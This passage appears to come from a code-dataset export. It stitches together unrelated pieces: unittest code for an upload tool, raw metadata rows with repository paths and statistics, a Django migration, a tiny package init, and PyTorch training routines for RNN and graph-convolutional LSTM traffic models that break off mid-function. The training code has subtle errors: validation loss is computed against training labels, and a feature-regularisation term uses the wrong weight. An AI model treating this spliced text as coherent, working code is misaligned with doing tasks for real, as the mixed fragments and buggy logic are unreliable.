# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_new_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues when directory status is new
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.NEW
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.progress.upload_status._set_run_delayed")
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_new_with_delay_config_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers,
mock_set_run_delayed):
"""
Checks that function exits with success when directory status is new and there is a delay set
:return:
"""
# set a delay
config.set_config_options(delay=1)
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.NEW
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_set_run_delayed.side_effect = [None]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_SUCCESS)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
mock_set_run_delayed.assert_called_with(stub_directory_status)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
# @patch("iridauploader.progress.upload_status._delayed_time_has_passed")
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_delay_time_has_passed_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits with success when directory status is delayed and the delay has passed
:return:
"""
# set a delay for 0 as time has passed
config.set_config_options(delay=0)
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.DELAYED
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload occurs
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.progress.upload_status._delayed_time_has_passed")
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_delay_not_passed_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers,
mock_delayed_time_has_passed):
"""
Checks that function exits with success when directory status is delayed and there is still delay time
:return:
"""
# set a delay
config.set_config_options(delay=1)
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.DELAYED
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_delayed_time_has_passed.side_effect = [False]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_SUCCESS)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
mock_delayed_time_has_passed.assert_called_with(stub_directory_status, 1)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_directory_not_writable_no_readonly_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits with success when directory status is delayed and there is still delay time
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.DELAYED
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [True]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
mock_upload_helpers.directory_has_readonly_conflict.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
class TestBatchUploadSingleEntry(unittest.TestCase):
"""
Tests the core.upload.batch_upload_single_entry function
"""
def setUp(self):
print("\nStarting " + self.__module__ + ": " + self._testMethodName)
config._init_config_parser()
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.parsing_handler")
def test_valid(self, mock_parsing_handler, mock_validate_and_upload):
"""
Makes sure that _validate_and_upload is only called on a new run
:return:
"""
class StubDirectoryStatus:
def __init__(self, directory, status):
self.directory = directory
self.status = status
self.message = None
def status_equals(self, other_status):
return self.status == other_status
# add mock data to the function calls that are essential
stub_directory_status_valid = StubDirectoryStatus("valid", DirectoryStatus.NEW)
stub_directory_status_invalid = StubDirectoryStatus("invalid", DirectoryStatus.INVALID)
stub_directory_status_complete = StubDirectoryStatus("complete", DirectoryStatus.COMPLETE)
stub_directory_status_partial = StubDirectoryStatus("partial", DirectoryStatus.PARTIAL)
mock_parsing_handler.get_run_status_list.side_effect = [
[stub_directory_status_valid,
stub_directory_status_invalid,
stub_directory_status_complete,
stub_directory_status_partial]
]
mock_parsing_handler.parse_and_validate.side_effect = ["Fake Sequencing Run"]
# start
upload.batch_upload_single_entry("fake_directory", upload_mode=MODE_DEFAULT)
# validate calls only happen once
mock_validate_and_upload.assert_called_once_with(stub_directory_status_valid, MODE_DEFAULT, False)
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.parsing_handler")
def test_valid_force(self, mock_parsing_handler, mock_validate_and_upload):
"""
Makes sure that _validate_and_upload is called on all runs except invalid
:return:
"""
class StubDirectoryStatus:
def __init__(self, directory, status):
self.directory = directory
self.status = status
self.message = None
def status_equals(self, other_status):
return self.status == other_status
# add mock data to the function calls that are essential
stub_directory_status_valid = StubDirectoryStatus("valid", DirectoryStatus.NEW)
stub_directory_status_invalid = StubDirectoryStatus("invalid", DirectoryStatus.INVALID)
stub_directory_status_complete = StubDirectoryStatus("complete", DirectoryStatus.COMPLETE)
stub_directory_status_partial = StubDirectoryStatus("partial", DirectoryStatus.PARTIAL)
mock_parsing_handler.get_run_status_list.side_effect = [
[stub_directory_status_valid,
stub_directory_status_invalid,
stub_directory_status_complete,
stub_directory_status_partial]
]
mock_parsing_handler.parse_and_validate.side_effect = ["Fake Sequencing Run"]
# start
upload.batch_upload_single_entry("fake_directory", force_upload=True)
# assert calls are what we expect
self.assertEqual(mock_validate_and_upload.call_count, 3, "Expected 3 calls to mock_validate_and_upload")
expected_call_args = [
call(stub_directory_status_valid, MODE_DEFAULT, False),
call(stub_directory_status_complete, MODE_DEFAULT, False),
call(stub_directory_status_partial, MODE_DEFAULT, False)
]
self.assertEqual(mock_validate_and_upload.call_args_list, expected_call_args, "Call args do not match expected")
| 43.102389
| 120
| 0.714546
| 2,889
| 25,258
| 5.824507
| 0.056075
| 0.114994
| 0.112914
| 0.09984
| 0.900755
| 0.891068
| 0.880371
| 0.864741
| 0.862899
| 0.862899
| 0
| 0.000452
| 0.212329
| 25,258
| 585
| 121
| 43.176068
| 0.845338
| 0.108203
| 0
| 0.737805
| 0
| 0
| 0.146764
| 0.120055
| 0
| 0
| 0
| 0
| 0.146341
| 1
| 0.088415
| false
| 0.018293
| 0.02439
| 0.02439
| 0.155488
| 0.012195
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
491c8062c63b9b5e751ed8bae4e0a1bd765db59f
| 84
|
py
|
Python
|
src/python/lib/__init__.py
|
hindsights/gml
|
876810c9dc3a33731e0df9dce9dfd68a655c6330
|
[
"MIT"
] | 3
|
2018-03-01T13:34:00.000Z
|
2018-04-02T03:02:22.000Z
|
src/python/lib/__init__.py
|
hindsights/gml
|
876810c9dc3a33731e0df9dce9dfd68a655c6330
|
[
"MIT"
] | null | null | null |
src/python/lib/__init__.py
|
hindsights/gml
|
876810c9dc3a33731e0df9dce9dfd68a655c6330
|
[
"MIT"
] | null | null | null |
import core
import lang
def loadAll():
return [core.loadAll(), lang.loadAll()]
| 14
| 43
| 0.690476
| 11
| 84
| 5.272727
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 84
| 5
| 44
| 16.8
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
4974aedd87921fb3cf7bd46c72f90c5e6165a0e6
| 122
|
py
|
Python
|
gitfu/commands/__init__.py
|
domanchi/gitfu
|
e856be58634f44f743e48f3881bc2e3a9cf35e1c
|
[
"MIT"
] | 2
|
2017-09-26T03:12:49.000Z
|
2022-01-23T10:50:10.000Z
|
gitfu/commands/__init__.py
|
domanchi/gitfu
|
e856be58634f44f743e48f3881bc2e3a9cf35e1c
|
[
"MIT"
] | null | null | null |
gitfu/commands/__init__.py
|
domanchi/gitfu
|
e856be58634f44f743e48f3881bc2e3a9cf35e1c
|
[
"MIT"
] | null | null | null |
# TODO: maybe we can do some magic initialization here.
from .check import run as check
from .commit import run as commit
| 30.5
| 55
| 0.778689
| 21
| 122
| 4.52381
| 0.714286
| 0.189474
| 0.231579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180328
| 122
| 3
| 56
| 40.666667
| 0.95
| 0.434426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4977a547da814a1f56653abab8f25aba7f2f126c
| 4,349
|
py
|
Python
|
src/djpaypal/migrations/0014_use_models_jsonfield.py
|
jleclanche/dj-paypal
|
3e45d4e1a1bf7346a33f7cc8d17f7660cf8b63c4
|
[
"MIT"
] | 1
|
2017-08-21T03:39:03.000Z
|
2017-08-21T03:39:03.000Z
|
src/djpaypal/migrations/0014_use_models_jsonfield.py
|
jleclanche/dj-paypal
|
3e45d4e1a1bf7346a33f7cc8d17f7660cf8b63c4
|
[
"MIT"
] | null | null | null |
src/djpaypal/migrations/0014_use_models_jsonfield.py
|
jleclanche/dj-paypal
|
3e45d4e1a1bf7346a33f7cc8d17f7660cf8b63c4
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.13 on 2022-05-11 15:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('djpaypal', '0013_billing_agreement_plan_model'),
]
operations = [
migrations.AlterField(
model_name='billingagreement',
name='agreement_details',
field=models.JSONField(),
),
migrations.AlterField(
model_name='billingagreement',
name='merchant',
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='billingagreement',
name='override_charge_mode',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='billingagreement',
name='override_merchant_preferences',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='billingagreement',
name='payer',
field=models.JSONField(),
),
migrations.AlterField(
model_name='billingagreement',
name='plan',
field=models.JSONField(),
),
migrations.AlterField(
model_name='billingagreement',
name='shipping_address',
field=models.JSONField(null=True),
),
migrations.AlterField(
model_name='billingplan',
name='merchant_preferences',
field=models.JSONField(),
),
migrations.AlterField(
model_name='dispute',
name='dispute_outcome',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='dispute',
name='disputed_transactions',
field=models.JSONField(editable=False),
),
migrations.AlterField(
model_name='dispute',
name='messages',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='dispute',
name='offer',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='dispute',
name='refund_details',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='payer',
name='shipping_address',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='payment',
name='payer',
field=models.JSONField(blank=True, null=True),
),
migrations.AlterField(
model_name='payment',
name='redirect_urls',
field=models.JSONField(),
),
migrations.AlterField(
model_name='payment',
name='transactions',
field=models.JSONField(),
),
migrations.AlterField(
model_name='preparedbillingagreement',
name='data',
field=models.JSONField(),
),
migrations.AlterField(
model_name='sale',
name='fmf_details',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='sale',
name='payment_hold_reasons',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='sale',
name='processor_response',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='webhookevent',
name='resource',
field=models.JSONField(editable=False),
),
migrations.AlterField(
model_name='webhookevent',
name='transmissions',
field=models.JSONField(blank=True, editable=False, null=True),
),
migrations.AlterField(
model_name='webhookeventtrigger',
name='headers',
field=models.JSONField(),
),
]
| 32.455224
| 74
| 0.55438
| 362
| 4,349
| 6.538674
| 0.198895
| 0.202788
| 0.253485
| 0.294043
| 0.815378
| 0.795099
| 0.705112
| 0.607098
| 0.597803
| 0.457964
| 0
| 0.006885
| 0.33203
| 4,349
| 133
| 75
| 32.699248
| 0.807917
| 0.010577
| 0
| 0.748032
| 1
| 0
| 0.142525
| 0.024878
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007874
| 0
| 0.031496
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
499eaf7dfc00dd82f39686fb71efeac535b2d299
| 61
|
py
|
Python
|
dir2/my_code2.py
|
jonnyv5/jv_pynet
|
95ffeb904de0300a34ace954945d61363a6ea246
|
[
"Apache-2.0"
] | null | null | null |
dir2/my_code2.py
|
jonnyv5/jv_pynet
|
95ffeb904de0300a34ace954945d61363a6ea246
|
[
"Apache-2.0"
] | null | null | null |
dir2/my_code2.py
|
jonnyv5/jv_pynet
|
95ffeb904de0300a34ace954945d61363a6ea246
|
[
"Apache-2.0"
] | null | null | null |
print("hello world code2.py")
print("hello world code2.py")
| 15.25
| 29
| 0.721311
| 10
| 61
| 4.4
| 0.5
| 0.454545
| 0.681818
| 0.909091
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037037
| 0.114754
| 61
| 3
| 30
| 20.333333
| 0.777778
| 0
| 0
| 1
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
b8e95fc4549cb871acb3842bcd4518eb48a97815
| 23,615
|
py
|
Python
|
Code_V1/Train_Validate.py
|
zhiyongc/Graph_Convolutional_LSTM
|
a703b63e626b1e2563fe3f45d9714e468b1d4a0e
|
[
"MIT"
] | 281
|
2018-05-01T03:38:50.000Z
|
2022-03-26T12:33:27.000Z
|
Code_V1/Train_Validate.py
|
zhiyongc/GraphConvolutionalLSTM
|
a703b63e626b1e2563fe3f45d9714e468b1d4a0e
|
[
"MIT"
] | 5
|
2018-11-21T09:32:46.000Z
|
2021-03-29T07:23:16.000Z
|
Code_V1/Train_Validate.py
|
zhiyongc/GraphConvolutionalLSTM
|
a703b63e626b1e2563fe3f45d9714e468b1d4a0e
|
[
"MIT"
] | 101
|
2018-06-25T08:48:12.000Z
|
2022-03-13T16:37:51.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 7 23:40:32 2018
@author: Zhiyong
"""
import torch
import numpy as np
from torch.autograd import Variable
import time
from Models import *
def TrainRNN(train_dataloader, valid_dataloader, num_epochs = 3):
inputs, labels = next(iter(train_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
input_dim = fea_size
hidden_dim = fea_size
output_dim = fea_size
rnn = RNN(input_dim, hidden_dim, output_dim)
rnn.cuda()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
learning_rate = 1e-5
optimizer = torch.optim.RMSprop(rnn.parameters(), lr = learning_rate)
use_gpu = torch.cuda.is_available()
interval = 100
losses_train = []
losses_interval_train = []
losses_valid = []
losses_interval_valid = []
cur_time = time.time()
pre_time = time.time()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
trained_number = 0
valid_dataloader_iter = iter(valid_dataloader)
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
rnn.zero_grad()
# rnn.loop()
hidden = rnn.initHidden(batch_size)
outputs = None
for i in range(10):
outputs, hidden = rnn(torch.squeeze(inputs[:,i:i+1,:]), hidden)
#######
loss_train = loss_MSE(outputs, labels)
losses_train.append(loss_train.data)
optimizer.zero_grad()
loss_train.backward()
optimizer.step()
# validation
try:
inputs_val, labels_val = next(valid_dataloader_iter)
except StopIteration:
valid_dataloader_iter = iter(valid_dataloader)
inputs_val, labels_val = next(valid_dataloader_iter)
if use_gpu:
inputs_val, labels_val = Variable(inputs_val.cuda()), Variable(labels_val.cuda())
else:
inputs_val, labels_val = Variable(inputs_val), Variable(labels_val)
hidden = rnn.initHidden(batch_size)
outputs = None
for i in range(10):
outputs, hidden = rnn(torch.squeeze(inputs_val[:,i:i+1,:]), hidden)
loss_valid = loss_MSE(outputs, labels_val)
losses_valid.append(loss_valid.data)
# output
trained_number += 1
if trained_number % interval == 0:
cur_time = time.time()
loss_interval_train = np.around(sum(losses_train[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_train.append(loss_interval_train)
loss_interval_valid = np.around(sum(losses_valid[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_valid.append(loss_interval_valid)
print('Iteration #: {}, train_loss: {}, valid_loss: {}, time: {}'.format(\
trained_number * batch_size, \
loss_interval_train,\
loss_interval_valid,\
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
return rnn, [losses_train, losses_interval_train, losses_valid, losses_interval_valid]
def TrainLSTM(train_dataloader, valid_dataloader, num_epochs = 3):
inputs, labels = next(iter(train_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
input_dim = fea_size
hidden_dim = fea_size
output_dim = fea_size
lstm = LSTM(input_dim, hidden_dim, output_dim)
lstm.cuda()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
learning_rate = 1e-5
optimizer = torch.optim.RMSprop(lstm.parameters(), lr = learning_rate)
use_gpu = torch.cuda.is_available()
interval = 100
losses_train = []
losses_interval_train = []
losses_valid = []
losses_interval_valid = []
cur_time = time.time()
pre_time = time.time()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
trained_number = 0
valid_dataloader_iter = iter(valid_dataloader)
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
lstm.zero_grad()
Hidden_State, Cell_State = lstm.loop(inputs)
loss_train = loss_MSE(Hidden_State, labels)
losses_train.append(loss_train.data)
optimizer.zero_grad()
loss_train.backward()
optimizer.step()
# validation
try:
inputs_val, labels_val = next(valid_dataloader_iter)
except StopIteration:
valid_dataloader_iter = iter(valid_dataloader)
inputs_val, labels_val = next(valid_dataloader_iter)
if use_gpu:
inputs_val, labels_val = Variable(inputs_val.cuda()), Variable(labels_val.cuda())
else:
inputs_val, labels_val = Variable(inputs_val), Variable(labels_val)
Hidden_State, Cell_State = lstm.loop(inputs_val)
loss_valid = loss_MSE(Hidden_State, labels_val)
losses_valid.append(loss_valid.data)
# output
trained_number += 1
if trained_number % interval == 0:
cur_time = time.time()
loss_interval_train = np.around(sum(losses_train[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_train.append(loss_interval_train)
loss_interval_valid = np.around(sum(losses_valid[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_valid.append(loss_interval_valid)
print('Iteration #: {}, train_loss: {}, valid_loss: {}, time: {}'.format(\
trained_number * batch_size, \
loss_interval_train,\
loss_interval_valid,\
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
return lstm, [losses_train, losses_interval_train, losses_valid, losses_interval_valid]
def TrainGraphConvolutionalLSTM(train_dataloader, valid_dataloader, A, FFR, K, back_length = 3, num_epochs = 3, Clamp_A=False):
inputs, labels = next(iter(train_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
input_dim = fea_size
hidden_dim = fea_size
output_dim = fea_size
gclstm = GraphConvolutionalLSTM(K, torch.Tensor(A), FFR[back_length], A.shape[0], Clamp_A=Clamp_A)
gclstm.cuda()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
learning_rate = 1e-5
optimizer = torch.optim.RMSprop(gclstm.parameters(), lr = learning_rate)
use_gpu = torch.cuda.is_available()
interval = 100
losses_train = []
losses_interval_train = []
losses_valid = []
losses_interval_valid = []
cur_time = time.time()
pre_time = time.time()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
trained_number = 0
# validation data loader iterator init
valid_dataloader_iter = iter(valid_dataloader)
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
gclstm.zero_grad()
Hidden_State, Cell_State = gclstm.loop(inputs)
loss_train = loss_MSE(Hidden_State, labels)
optimizer.zero_grad()
loss_train.backward()
optimizer.step()
losses_train.append(loss_train.data)
# validation
try:
inputs_val, labels_val = next(valid_dataloader_iter)
except StopIteration:
valid_dataloader_iter = iter(valid_dataloader)
inputs_val, labels_val = next(valid_dataloader_iter)
if use_gpu:
inputs_val, labels_val = Variable(inputs_val.cuda()), Variable(labels_val.cuda())
else:
inputs_val, labels_val = Variable(inputs_val), Variable(labels_val)
Hidden_State, Cell_State = gclstm.loop(inputs_val)
loss_valid = loss_MSE(Hidden_State, labels)
losses_valid.append(loss_valid.data)
# output
trained_number += 1
if trained_number % interval == 0:
cur_time = time.time()
loss_interval_train = np.around(sum(losses_train[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_train.append(loss_interval_train)
loss_interval_valid = np.around(sum(losses_valid[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_valid.append(loss_interval_valid)
print('Iteration #: {}, train_loss: {}, valid_loss: {}, time: {}'.format(\
trained_number * batch_size, \
loss_interval_train,\
loss_interval_valid,\
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
return gclstm, [losses_train, losses_interval_train, losses_valid, losses_interval_valid]
def TrainGraphConvolutionalLSTM_Proposed(train_dataloader, valid_dataloader, A, FFR, K, back_length = 3, num_epochs = 3, Clamp_A=False, lambda_Aweight = 0.01, lambda_fea = 0.01):
inputs, labels = next(iter(train_dataloader))
[batch_size, step_size, fea_size] = inputs.size()
input_dim = fea_size
hidden_dim = fea_size
output_dim = fea_size
gclstm = GraphConvolutionalLSTM(K, torch.Tensor(A), FFR[back_length-1], A.shape[0], Clamp_A=Clamp_A)
gclstm.cuda()
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
learning_rate = 1e-5
optimizer = torch.optim.RMSprop(gclstm.parameters(), lr = learning_rate)
use_gpu = torch.cuda.is_available()
interval = 100
losses_train = []
losses_interval_train = []
losses_valid = []
losses_interval_valid = []
cur_time = time.time()
pre_time = time.time()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
trained_number = 0
# validation data loader iterator init
valid_dataloader_iter = iter(valid_dataloader)
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
if use_gpu:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
else:
inputs, labels = Variable(inputs), Variable(labels)
gclstm.zero_grad()
batch_size = inputs.size(0)
time_step = inputs.size(1)
Hidden_State, Cell_State = gclstm.initHidden(batch_size)
previous_grads = []
# Proposed Real Time Branching Learning Method
for i in range(time_step):
Hidden_State, Cell_State, gc = gclstm.forward(torch.squeeze(inputs[:,i:i+1,:]), Hidden_State, Cell_State)
gclstm.zero_grad()
if i != time_step - 1:
label_loss = loss_MSE(Hidden_State, torch.squeeze(inputs[:,i+1:i+2,:]))
else:
label_loss = loss_MSE(Hidden_State, labels)
# Graph Convolution Weight Regularization
weight_loss = 0
for idx in range(K):
gc_i_weight = gclstm.gc_list[idx].weight
A_i = gclstm.A_list[idx]
weight_loss+=loss_L1(torch.mul(gc_i_weight, Variable(A_i).cuda()), target=torch.zeros_like(gc_i_weight))
# Graph Convolution Features Regularization
gc_loss = 0
gc_features = torch.chunk(gc, K, 1)
for idx in range(K-1):
gc_i = gc_features[idx]
gc_i1 = gc_features[idx+1]
gc_loss = gc_loss + loss_MSE(Variable(gc_i.data).cuda(), Variable(gc_i1.data).cuda())
loss = label_loss + weight_loss * lambda_Aweight + gc_loss * lambda_Aweight
optimizer.zero_grad()
loss.backward()
curr_grad = [x.grad.data for x in list(gclstm.parameters())]
if len(previous_grads) != 0: # not null
previous_grads_sum = previous_grads[0] # sum of gradients in previous steps
for idx in range(1, len(previous_grads)):
pre_grad = previous_grads[idx]
previous_grads_sum += pre_grad
# add previous gradients to current step only for the LSTM weights and bias, not for GC weights
idx = 0
for x in list(gclstm.parameters()):
if idx >= K: # not add grads on GC1, GC2, GC3...
x.grad.data += previous_grads_sum[idx]
idx+=1
# only store fixed steps of previous gradients ( length = back_length)
if len(previous_grads) == back_length:
previous_grads.pop(0)
previous_grads.append(curr_grad)
else:
previous_grads.append(curr_grad)
optimizer.step()
Hidden_State, Cell_State = gclstm.reinitHidden(batch_size, Hidden_State.data, Cell_State.data)
loss_train = loss_MSE(Hidden_State, labels)
losses_train.append(loss_train.data)
# validation
try:
inputs_val, labels_val = next(valid_dataloader_iter)
except StopIteration:
valid_dataloader_iter = iter(valid_dataloader)
inputs_val, labels_val = next(valid_dataloader_iter)
if use_gpu:
inputs_val, labels_val = Variable(inputs_val.cuda()), Variable(labels_val.cuda())
else:
inputs_val, labels_val = Variable(inputs_val), Variable(labels_val)
Hidden_State, Cell_State = gclstm.loop(inputs_val)
loss_valid = loss_MSE(Hidden_State, labels)
losses_valid.append(loss_valid.data)
# output
trained_number += 1
if trained_number % interval == 0:
cur_time = time.time()
loss_interval_train = np.around(sum(losses_train[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_train.append(loss_interval_train)
loss_interval_valid = np.around(sum(losses_valid[-interval:]).cpu().numpy()[0]/interval, decimals=8)
losses_interval_valid.append(loss_interval_valid)
print('Iteration #: {}, train_loss: {}, valid_loss: {}, time: {}'.format(\
trained_number * batch_size, \
loss_interval_train,\
loss_interval_valid,\
np.around([cur_time - pre_time], decimals=8) ) )
pre_time = cur_time
return gclstm, [losses_train, losses_interval_train, losses_valid, losses_interval_valid]
def TestRNN(rnn, test_dataloader, max_speed):
inputs, labels = next(iter(test_dataloader))
